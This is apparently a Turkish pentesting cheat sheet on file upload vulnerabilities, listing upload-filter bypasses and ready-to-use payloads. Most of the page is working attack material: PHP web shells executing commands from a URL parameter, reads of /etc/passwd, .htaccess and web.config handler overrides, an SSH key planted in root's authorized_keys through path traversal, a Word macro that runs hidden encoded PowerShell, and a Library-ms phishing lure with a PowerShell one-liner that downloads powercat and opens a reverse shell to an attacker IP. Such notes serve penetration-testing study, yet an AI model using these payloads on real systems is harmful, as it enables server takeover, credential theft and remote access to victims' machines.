File Upload

File Upload Nedir?

Dosya yükleme güvenlik açıkları, bir web sunucusunun kullanıcıların dosya adı, türü, içeriği veya boyutu gibi şeyleri yeterince doğrulamadan dosya sistemine dosya yüklemesine izin vermesidir. Bunlarla ilgili kısıtlamaların düzgün bir şekilde uygulanmaması, basit bir resim yükleme işlevinin bile tehlikeli dosyalar yüklemek için kullanılabileceği anlamına gelebilir. Bu, uzaktan kod yürütülmesini sağlayan sunucu tarafı komut dosyalarını bile içerebilir.

Bazı durumlarda, dosyayı yükleme eylemi kendi başına hasara neden olmak için yeterlidir. Diğer saldırılar, tipik olarak sunucu tarafından yürütülmesini tetiklemek için dosya için takip eden bir HTTP isteği içerebilir.

Saldırı Yöntemleri

Kontroller

  • İlk adım olarak normal bir dosya yüklemeyi deniyoruz. Eğer bu dosyaya doğrudan erişebiliyorsak bir sonraki adımları deneyebiliriz.

  • Eğer dosya yükleniyorsa ve nereye yüklendiğini bilmiyorsak dizin taraması yapabiliriz.

  • Eğer dosyaya erişebiliyorsak dosyanın uzantısının değişmiyor olması gerekir.

Content-Type Koruması

Eğer dosyanın türü content-type header ile kontrol ediliyorsa php payload gönderip content-type başlığını kabul edilen bir tipe çevirebiliriz.

Content-Type: image/jpeg
Content-Type: image/png

Path Traversal

Sunucu tarafında bir dizindeki hiçbir dosyanın kod çalıştıramaması için bir güvenlik önlemi alınmış olabilir. Eğer path traversal zafiyeti varsa bu dizinin dışına dosyamızı yükleyebiliriz.

../shell.php
../../shell.php

Whitelist Atlatma

Eğer dosya uzantısı kontrolü varsa aşağıdaki payloadlar çalışabilir.

shell.png.php
shell.jpg.php
shell.php%00.jpg

Blacklist Atlatma

Eğer blacklist kontrolü zayıf ise aşağıdaki uzantılar ile dosya yükleyebiliriz.

shell.php
shell.php2
shell.php3
shell.php4
shell.php5
shell.php6
shell.php7
shell.phar
shell.pHp

Eğer uzantı kontrolü atlatılamıyorsa dizine htaccess dosyası yüklüyoruz ve bu dosyada dizindeki .l33t uzantısına sahip dosyaların php olarak yorumlanmasını sağlıyoruz.

filename=".htaccess"
Content-Type: text/plain

AddType application/x-httpd-php .l33t
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!--
<%
Response.write("-"&"->")
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

Magic Number

File Signatures: https://en.wikipedia.org/wiki/List_of_file_signatures

hexedit shell.php

FFD8FFE000104A4649460001 # JPEG 12 karakter
89504E470D0A1A0A # PNG 8 karakter

Client-side Koruma Atlatma

Eğer kontroller front-end tarafında yapılıyorsa burp ile araya girip kontrolün yapıldığı satırı silebiliriz.

Polyglot

Eğer yanıtta dosyanın metadatasını görebiliyorsak yorum bölümüne bir php kodu yazabiliriz.

exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" shell.jpg -o shell.php

Race Condition

Eğer yüklediğimiz dosya kontrol edilmeden önce sunucuya yükleniyorsa ve sonradan siliniyorsa dosyayı yükleme ve okuma işlemini ard arda yapmayı deneyebiliriz.

Turbo intruder veya grup haline paralel göndermeyi deneyebiliriz.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''<YOUR-POST-REQUEST>'''

    request2 = '''<YOUR-GET-REQUEST>'''

    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

Payload

<?php phpinfo(); ?>

<?php echo exec('whoami'); ?>
<?php echo system($_GET['cmd']); ?>

<?php echo file_get_contents('/etc/passwd'); ?>
<?php echo file_get_contents('C:/windows/system32/drivers/etc/hosts'); ?>

MD-TO-PDF Exploit

---js
((require("child_process")).execSync("whoami"))
---RCE

SSH Key

Eğer sadece dosya oluşturabiliyorsak fakat görüntüleyemiyor isek kendi public keyimizi karşıya yükleyebiliriz.

ssh-keygen
cat /root/.ssh/id_rsa.pub
rm /root/.ssh/known_hosts

uploadFile=../../../../../../root/.ssh/authorized_keys
ssh root@example.com -i /root/.ssh/id_rsa

Word Macro RCE (.doc)

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
        Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
        Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
        Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
        Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
        Str = Str + "A== "

    CreateObject("Wscript.Shell").Run Str
End Sub

Windows Library RCE

Bu dosyayı windowsta oluşturuyoruz.

config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.119.2</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Sonrasında bu komut ile bir webdav server açıyoruz.

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root ./

Aşağıdaki komutun olduğu bir shortcut oluşturuyoruz. Bu iki dosyayı library ms dosyasını kullanarak kendimize atıyoruz.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.181/powercat.ps1');powercat -c 192.168.45.181 -p 1234 -e powershell"

Bir kurbana config.Library-ms dosyasını atıyoruz. Eğer oraya tıklarsa bizim shortcut olan dosyamızı görecek ona da tıklarsa shell gelir.

Araçlar

Powny-shell: https://github.com/flozz/p0wny-shell

Upload Scanner: https://github.com/PortSwigger/upload-scanner

Kaynaklar

Portswigger Academy: https://portswigger.net/web-security/file-upload

PreviousBusiness LogicNextRace Conditions

Last updated